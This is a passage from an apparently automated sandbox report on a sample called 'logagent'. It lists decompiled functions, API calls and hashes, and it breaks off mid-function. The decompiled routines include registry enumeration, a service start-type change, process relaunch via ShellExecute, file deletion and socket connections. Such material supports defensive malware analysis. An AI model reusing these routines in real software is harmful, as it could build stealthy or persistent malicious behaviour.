                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetCursorInfo$User32.dll
                                  • API String ID: 1646373207-2714051624
                                  • Opcode ID: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                  • Instruction ID: c5b485f27e89021cea1a89f12a6954dfd40793fe5a01e249b662889bc5cfc0be
                                  • Opcode Fuzzy Hash: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                  • Instruction Fuzzy Hash: F0C04C75551600A686005FA1BC0D6D53A14A956745711C436B802B1255CB7C41459E5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413AED Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00413AED() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
				 *0x41c1f8 = _t2;
				return _t2;
			}




                                  0x00413b03
                                  0x00413b09
                                  0x00413b0e

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00413AFC
                                  • GetProcAddress.KERNEL32(00000000), ref: 00413B03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetConsoleWindow$kernel32.dll
                                  • API String ID: 2574300362-100875112
                                  • Opcode ID: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                  • Instruction ID: 6ee53b0f0035eccf7fe7e145557d43f0b39688fed8dbf49153f7f93891f0b47b
                                  • Opcode Fuzzy Hash: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                  • Instruction Fuzzy Hash: 83C09BB4AD1611FB86015FA0BC4EAC87B145A46707332C077781191255DA7880C45A1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10554A4E Relevance: 6.2, APIs: 4, Instructions: 239registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,00416D14,00000000,00020019,?), ref: 10554A6E
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 10554AEF
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 979fdd5254cc4c27311b9c274e256766b3b49beeaf30f9016725a57611e26328
                                  • Instruction ID: deda25523b40f07d485e4c6beafc31ad429a85cb0bfd500da4c4ec30344f3b2f
                                  • Opcode Fuzzy Hash: 979fdd5254cc4c27311b9c274e256766b3b49beeaf30f9016725a57611e26328
                                  • Instruction Fuzzy Hash: CF91E77280011DEBCB10EB90DD99EEEBB7CEF54345F1041A6B506E3050EA75AB48CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054D4AF Relevance: 6.2, APIs: 4, Instructions: 191registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 1054D51E
                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 1054D54D
                                  • RegEnumValueW.ADVAPI32(?,?,?,00003FFF,00000000,?,?,00002710), ref: 1054D5F6
                                  • _itoa.MSVCRT ref: 1054D60D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Enum$InfoQueryValue_itoa
                                  • String ID:
                                  • API String ID: 1491424833-0
                                  • Opcode ID: b1867c68a391b90c66befa23e548497b30fbbf7e2f0c3cf9f2592526b94ff00a
                                  • Instruction ID: abee16490ea2dc664203fc956c9549b579dec4f08fefc88b704cadffb3268a36
                                  • Opcode Fuzzy Hash: b1867c68a391b90c66befa23e548497b30fbbf7e2f0c3cf9f2592526b94ff00a
                                  • Instruction Fuzzy Hash: D971967290021EEFDB01DBD0DC99DEEBB7DEB48345F104166E606E2150EB74AA49CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10543BAD Relevance: 6.2, APIs: 4, Instructions: 151synchronizationthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10543CFC
                                  • CreateThread.KERNEL32(00000000,00000000,?,0041B240,00000000,00000000), ref: 10543D0D
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10543D18
                                  • CloseHandle.KERNEL32(00000000), ref: 10543D21
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 3360349984-0
                                  • Opcode ID: f6904c9295964ea6d05f5ace830b7d8d921c2bddda9a6e6440481497a3acfa2b
                                  • Instruction ID: 2ba0387754a66bb31b6ac716df962f2aa01e25be4528ebc63d140d98dc666e2e
                                  • Opcode Fuzzy Hash: f6904c9295964ea6d05f5ace830b7d8d921c2bddda9a6e6440481497a3acfa2b
                                  • Instruction Fuzzy Hash: 0B51EB7290060EEFCB049FA4DD99CEEBF79FF88395B008429F91297161DB709A85CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054A335 Relevance: 6.1, APIs: 4, Instructions: 134COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 1054C61B: TerminateProcess.KERNEL32(00000000,?,10549BE2), ref: 1054C62B
                                    • Part of subcall function 1054C61B: WaitForSingleObject.KERNEL32(000000FF,?,10549BE2), ref: 1054C63E
                                    • Part of subcall function 1054D021: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 1054D03B
                                    • Part of subcall function 1054D021: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,80000001,10544BEE,0041BA38), ref: 1054D057
                                    • Part of subcall function 1054D021: RegCloseKey.ADVAPI32(?), ref: 1054D062
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 1054A396
                                  • _wgetenv.MSVCRT ref: 1054A3AA
                                  • ShellExecuteW.SHELL32(00000000,0041578C,00000000), ref: 1054A4C0
                                  • exit.MSVCRT ref: 1054A4CC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseExecuteFileModuleNameObjectOpenProcessQueryShellSingleTerminateValueWait_wgetenvexit
                                  • String ID:
                                  • API String ID: 1669883435-0
                                  • Opcode ID: 36730b68c876fba5bf6b311daab70d26e16060d5c7b1821c68368bdd8b92c69d
                                  • Instruction ID: 67d6ef67ea974b3a23237c924f8bb1ae1cae459f6018489c3f142a7e377e42cb
                                  • Opcode Fuzzy Hash: 36730b68c876fba5bf6b311daab70d26e16060d5c7b1821c68368bdd8b92c69d
                                  • Instruction Fuzzy Hash: 27412D7280050DEBDB04EBE0ED4DDEE7B7CEF88245B604065F516E3090EB756A09CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 105502B6 Relevance: 6.1, APIs: 4, Instructions: 121sleepfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _wgetenv.MSVCRT ref: 105502CD
                                  • ShellExecuteW.SHELL32(00000000,0041578C,00416984,00000000,?,00000000), ref: 10550321
                                    • Part of subcall function 1055476E: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,105435A8,00000000), ref: 10554788
                                  • Sleep.KERNEL32(00000064,00000000,00000000), ref: 10550356
                                  • DeleteFileW.KERNEL32(00000000), ref: 1055038D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateDeleteExecuteShellSleep_wgetenv
                                  • String ID:
                                  • API String ID: 1374653677-0
                                  • Opcode ID: 8343fac9947079cf2d62a9b7fe42f8f7cebfed9dfd8b971e217756b2f2b08bd1
                                  • Instruction ID: 3daf5320e360039866d27c13fbd300ce230a7e00d4335818beeaf2a9b8c70b2d
                                  • Opcode Fuzzy Hash: 8343fac9947079cf2d62a9b7fe42f8f7cebfed9dfd8b971e217756b2f2b08bd1
                                  • Instruction Fuzzy Hash: 2141557280050DEFCB04EBE0ED9E9EEBB7CEF54245B604026F912E7091EB716A09CB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10553C99 Relevance: 6.1, APIs: 4, Instructions: 90sleeplibraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E10553C99(void* __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v44;
				char _v52;
				char _v60;
				char _v68;
				char _v76;
				char _v84;
				void* _t39;
				void* _t41;
				void* _t45;
				void* _t50;
				void* _t54;
				intOrPtr _t56;
				intOrPtr* _t59;

				_t56 = __edx;
				_t54 = __ecx;
				_t59 = GetProcAddress(GetModuleHandleA(0x4165f4), 0x416c3c);
				 *_t59( &_v44,  &_v60,  &_v76);
				Sleep(0x3e8);
				 *_t59( &_v52,  &_v68,  &_v84);
				_v28 = E10553D7D(_t54,  &_v44);
				_v24 = _t56;
				_v20 = E10553D7D(_t54,  &_v52);
				_v16 = _t56;
				_t39 = E10553D7D(_t54,  &_v60);
				_v32 = _t56;
				_t41 = E10553D7D(_t54,  &_v68);
				_v12 = E10553D7D(_t54,  &_v76);
				asm("sbb edi, [ebp-0x1c]");
				_v8 = _t56;
				_v32 = _t56;
				_t45 = E10553D7D(_t54,  &_v84);
				asm("sbb edi, [ebp-0x4]");
				asm("sbb ecx, [ebp-0xc]");
				asm("adc ecx, [ebp-0x1c]");
				asm("adc ecx, [ebp-0x14]");
				_t50 = E105558FF(_t45 - _v12 - _v20 + _t41 - _t39 + _v28, _t56, 0x64, 0);
				asm("adc edi, [ebp-0x1c]");
				return E1055588F(_t50, _t56, _t45 - _v12 + _t41 - _t39, _t56);
			}























                                  0x10553c99
                                  0x10553c99
                                  0x10553cb9
                                  0x10553cc7
                                  0x10553cce
                                  0x10553ce0
                                  0x10553ceb
                                  0x10553cf2
                                  0x10553cfa
                                  0x10553d01
                                  0x10553d04
                                  0x10553d0f
                                  0x10553d12
                                  0x10553d26
                                  0x10553d29
                                  0x10553d30
                                  0x10553d35
                                  0x10553d38
                                  0x10553d4b
                                  0x10553d55
                                  0x10553d5a
                                  0x10553d60
                                  0x10553d65
                                  0x10553d6c
                                  0x10553d7c

                                  APIs
                                  • GetModuleHandleA.KERNEL32(004165F4,00416C3C,?,0041B320), ref: 10553CAC
                                  • GetProcAddress.KERNEL32(00000000), ref: 10553CB3
                                  • Sleep.KERNEL32(000003E8,?,0041B320), ref: 10553CCE
                                  • __aulldiv.LIBCMT ref: 10553D73
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProcSleep__aulldiv
                                  • String ID:
                                  • API String ID: 482274533-0
                                  • Opcode ID: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                  • Instruction ID: e3a3a8c3d7a79754f9aa8e0ce1dde822a5cb1b5f7c87105496dd61f204d78da6
                                  • Opcode Fuzzy Hash: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                  • Instruction Fuzzy Hash: 1A31DF76D0021DABCB01DBE4CC89DEFBFBCEF88650F144526E515F7241D674A6498BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1055199E Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                  Download Yara Rule
                                  APIs
                                  • EnumDisplayMonitors.USER32(00000000,00000000,0041010A,00000000), ref: 105519CC
                                  • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 105519DC
                                  • EnumDisplayDevicesW.USER32(?,00000000,?,00000000), ref: 10551A07
                                  • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 10551A6E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DisplayEnum$Devices$Monitors
                                  • String ID:
                                  • API String ID: 1432082543-0
                                  • Opcode ID: 2a8bf80244e73db8b672108339938ec36978e45915be8a8cfec9bbfac7a636db
                                  • Instruction ID: 3b8c43d80bf28f61e6645a612481e6431e14e047a93d0368fcca146c63d5e8aa
                                  • Opcode Fuzzy Hash: 2a8bf80244e73db8b672108339938ec36978e45915be8a8cfec9bbfac7a636db
                                  • Instruction Fuzzy Hash: 4921D87290111EABDB519BA1DC88DEFBF7CEF09355F004166F50AE2050EB749689CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 105532B6 Relevance: 6.1, APIs: 4, Instructions: 64serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 17%
                                  			E105532B6(void* _a4, signed char _a20) {
				signed int _t10;
				int _t11;
				void* _t16;
				short* _t19;
				int _t21;
				void* _t23;
				void* _t24;
				intOrPtr* _t25;

				_t19 = 0;
				_t24 = OpenSCManagerW(0, 0, 2);
				_t23 = OpenServiceW(_t24,  *0x41532c(), 2);
				if(_t23 != 0) {
					_t21 =  &_a4 | 0xffffffff;
					_t10 = _a20 & 0x000000ff;
					if(_t10 == 0) {
						_push(4);
						goto L8;
					} else {
						_t16 = _t10 - 1;
						if(_t16 == 0) {
							_push(2);
							goto L8;
						} else {
							if(_t16 == 1) {
								_push(3);
								L8:
								_pop(_t21);
							}
						}
					}
					_t11 = ChangeServiceConfigW(_t23, 0xffffffff, _t21, 0xffffffff, _t19, _t19, _t19, _t19, _t19, _t19, _t19);
					_t25 =  *0x415068;
					_t19 = _t19 & 0xffffff00 | _t11 != 0x00000000;
					 *_t25(_t24);
					 *_t25(_t23);
				} else {
					CloseServiceHandle(_t24);
				}
				 *0x415350();
				return _t19;
			}











                                  0x105532bc
                                  0x105532cd
                                  0x105532dd
                                  0x105532e1
                                  0x105532f0
                                  0x105532f3
                                  0x105532f5
                                  0x10553305
                                  0x00000000
                                  0x105532f7
                                  0x105532f7
                                  0x105532f8
                                  0x10553301
                                  0x00000000
                                  0x105532fa
                                  0x105532fb
                                  0x105532fd
                                  0x10553307
                                  0x10553307
                                  0x10553307
                                  0x105532fb
                                  0x105532f8
                                  0x10553315
                                  0x1055331e
                                  0x10553324
                                  0x10553327
                                  0x1055332a
                                  0x105532e3
                                  0x105532e4
                                  0x105532e4
                                  0x1055332f
                                  0x1055333b

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,0041B310,?,?,10552968), ref: 105532C2
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,10552968), ref: 105532D7
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,10552968), ref: 105532E4
                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,10552968), ref: 10553315
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$Open$ChangeCloseConfigHandleManager
                                  • String ID:
                                  • API String ID: 110783151-0
                                  • Opcode ID: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                  • Instruction ID: 6da5318f99382357567d5d32902a6194b09d4948e2004b57c9f681269b631431
                                  • Opcode Fuzzy Hash: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                  • Instruction Fuzzy Hash: B901B171104529BBE7001BB4EC4EEFB3F5CEB453B0F528626F529921D1CE609D49C5A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10546EC1 Relevance: 6.1, APIs: 4, Instructions: 59sleepfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E10546EC1(void* __ecx) {
				int _t9;
				long _t14;
				void* _t23;
				void* _t24;
				void* _t30;

				_t9 =  *0x41b988 |  *0x41b98c;
				_t24 = __ecx;
				if(_t9 != 0) {
					 *((char*)(__ecx + 0x30)) = 0;
					do {
						_t9 = CreateFileW( *0x41532c(), 0x80000000, 7, 0, 3, 0x80, 0);
						_t23 = _t9;
						if(_t23 == 0xffffffff) {
							 *((char*)(_t24 + 0x30)) = 0;
						} else {
							_t14 = GetFileSize(_t23, 0);
							_t30 = 0 -  *0x41b98c;
							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x41b988)) {
								 *((char*)(_t24 + 0x30)) = 1;
								if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
									E105476DF(_t24);
								}
								Sleep(0x2710);
							}
							_t9 = CloseHandle(_t23);
						}
					} while ( *((char*)(_t24 + 0x30)) == 1);
					if( *((intOrPtr*)(_t24 + 0x3c)) == 0 &&  *0x41b154 == 0x31) {
						 *0x415298();
						return E10546B0F(_t24, _t24 + 0x54);
					}
				}
				return _t9;
			}








                                  0x10546ec7
                                  0x10546ecf
                                  0x10546ed1
                                  0x10546ed9
                                  0x10546edc
                                  0x10546ef8
                                  0x10546efe
                                  0x10546f03
                                  0x10546f45
                                  0x10546f05
                                  0x10546f07
                                  0x10546f0f
                                  0x10546f15
                                  0x10546f24
                                  0x10546f28
                                  0x10546f2c
                                  0x10546f2c
                                  0x10546f36
                                  0x10546f36
                                  0x10546f3d
                                  0x10546f3d
                                  0x10546f48
                                  0x10546f51
                                  0x10546f65
                                  0x00000000
                                  0x10546f6d
                                  0x10546f51
                                  0x10546f75

                                  APIs
                                  • CreateFileW.KERNEL32(00000000), ref: 10546EF8
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 10546F07
                                  • Sleep.KERNEL32(00002710), ref: 10546F36
                                  • CloseHandle.KERNEL32(00000000), ref: 10546F3D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSizeSleep
                                  • String ID:
                                  • API String ID: 1958988193-0
                                  • Opcode ID: 1c13c5a467e04571e64093ad109626eed774499539b51b73ca94ee26c3b54795
                                  • Instruction ID: bdd24677f851696f1759cae2d614dd93d5401da7db0ed02d85374aab91c86406
                                  • Opcode Fuzzy Hash: 1c13c5a467e04571e64093ad109626eed774499539b51b73ca94ee26c3b54795
                                  • Instruction Fuzzy Hash: 05117D70690A40FFD7515374B898BDA7FA8EB49340F10842DF5C2C3594EBA06848CB37
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412D56 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00412D56(void* __ecx, void* _a4, long _a8, long _a12, intOrPtr _a16) {
				long _v8;
				long _v12;
				intOrPtr _t14;
				struct _OVERLAPPED* _t19;
				long _t22;
				struct _OVERLAPPED* _t24;
				void* _t28;

				_t24 = 0;
				_t14 = _a16;
				if(_t14 == 0) {
					_v12 = 0x40000000;
					_v8 = 2;
				} else {
					if(_t14 == 1) {
						_t22 = 4;
						_v12 = _t22;
						_v8 = _t22;
					}
				}
				_t28 = CreateFileW(_a12, _v12, _t24, _t24, _v8, 0x80, _t24);
				if(_t28 != 0xffffffff) {
					if(_a16 != 1 || SetFilePointer(_t28, _t24, _t24, 2) != 0xffffffff) {
						if(WriteFile(_t28, _a4, _a8,  &_a12, _t24) != 0) {
							_t24 = 1;
						}
					}
					CloseHandle(_t28);
					_t19 = _t24;
				} else {
					_t19 = 0;
				}
				return _t19;
			}










                                  0x00412d5f
                                  0x00412d62
                                  0x00412d64
                                  0x00412d74
                                  0x00412d7b
                                  0x00412d66
                                  0x00412d67
                                  0x00412d6b
                                  0x00412d6c
                                  0x00412d6f
                                  0x00412d6f
                                  0x00412d67
                                  0x00412d99
                                  0x00412d9e
                                  0x00412da8
                                  0x00412dce
                                  0x00412dd0
                                  0x00412dd0
                                  0x00412dce
                                  0x00412dd3
                                  0x00412dd9
                                  0x00412da0
                                  0x00412da0
                                  0x00412da0
                                  0x00412dde

                                  APIs
                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00412DAF
                                  • WriteFile.KERNEL32(00000000,40000000,?,?,00000000), ref: 00412DC6
                                  • CloseHandle.KERNEL32(00000000), ref: 00412DD3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandlePointerWrite
                                  • String ID:
                                  • API String ID: 3604237281-0
                                  • Opcode ID: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                  • Instruction ID: ca773920b5f39e1e62b037f934487c6bab51a0d9f38e2d78726aa57b3ce32958
                                  • Opcode Fuzzy Hash: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                  • Instruction Fuzzy Hash: 26118E71500508BFDF118F94ED88FEF7B6CEB05368F108222F911D6190D2B54EA09768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B615 Relevance: 6.1, APIs: 4, Instructions: 57registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0040B615(void* __ecx, intOrPtr _a4, void* _a8, short* _a12, char _a15) {
				int _v8;
				int _v12;
				char* _t31;
				signed int _t36;
				signed int _t37;
				void* _t46;

				_v8 = 0;
				_t31 = 0x415664;
				if(RegQueryValueExW(_a8, _a12, 0,  &_v12, 0,  &_v8) == 0 && _v8 > 0) {
					_t31 = malloc(_v8);
					_t36 = _v8;
					_t46 = _t31;
					_t37 = _t36 >> 2;
					memset(_t46 + _t37, memset(_t46, 0, _t37 << 2), (_t36 & 0x00000003) << 0);
					RegQueryValueExW(_a8, _a12, 0,  &_v12, _t31,  &_v8);
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t31,  &_a15);
				return _a4;
			}









                                  0x0040b62f
                                  0x0040b635
                                  0x0040b641
                                  0x0040b652
                                  0x0040b654
                                  0x0040b65b
                                  0x0040b65d
                                  0x0040b667
                                  0x0040b67a
                                  0x0040b67a
                                  0x0040b684
                                  0x0040b691

                                  APIs
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B63D
                                  • malloc.MSVCRT ref: 0040B64B
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B67A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415664,?), ref: 0040B684
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: QueryV?$allocator@Value$??0?$basic_string@G@1@@G@2@@std@@G@std@@U?$char_traits@malloc
                                  • String ID:
                                  • API String ID: 3506253819-0
                                  • Opcode ID: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                  • Instruction ID: 6657ce7e0b4af722a3644f787a918a8cc9d20f3304ca96b666d2b0068cb46159
                                  • Opcode Fuzzy Hash: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                  • Instruction Fuzzy Hash: 3E11097260010DFFDB05DF95DD80DEFBBBDEB88250B10406ABA05D6250D7719E149BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004028CD Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004028DC
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402915
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402928
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040295E,00000001,00000073), ref: 00402953
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@$??1?$basic_string@??4?$basic_string@V01@connectsocket
                                  • String ID:
                                  • API String ID: 182292213-0
                                  • Opcode ID: e8679a6b84cd13b518d2f85527ac5e7d509b52d12921196b337c3ffbd5f7c91e
                                  • Instruction ID: 3575325012e9a6a69ab12c81105f5cb7c7dcd4fb264b21d23710b3ab9203063c
                                  • Opcode Fuzzy Hash: e8679a6b84cd13b518d2f85527ac5e7d509b52d12921196b337c3ffbd5f7c91e
                                  • Instruction Fuzzy Hash: 0301B97170030867DB00BB76DE4D6EE3A5DDBC5350F40803ABE169B2D1CBB9894483D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401181 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00401181(void* __eflags, signed int _a4) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
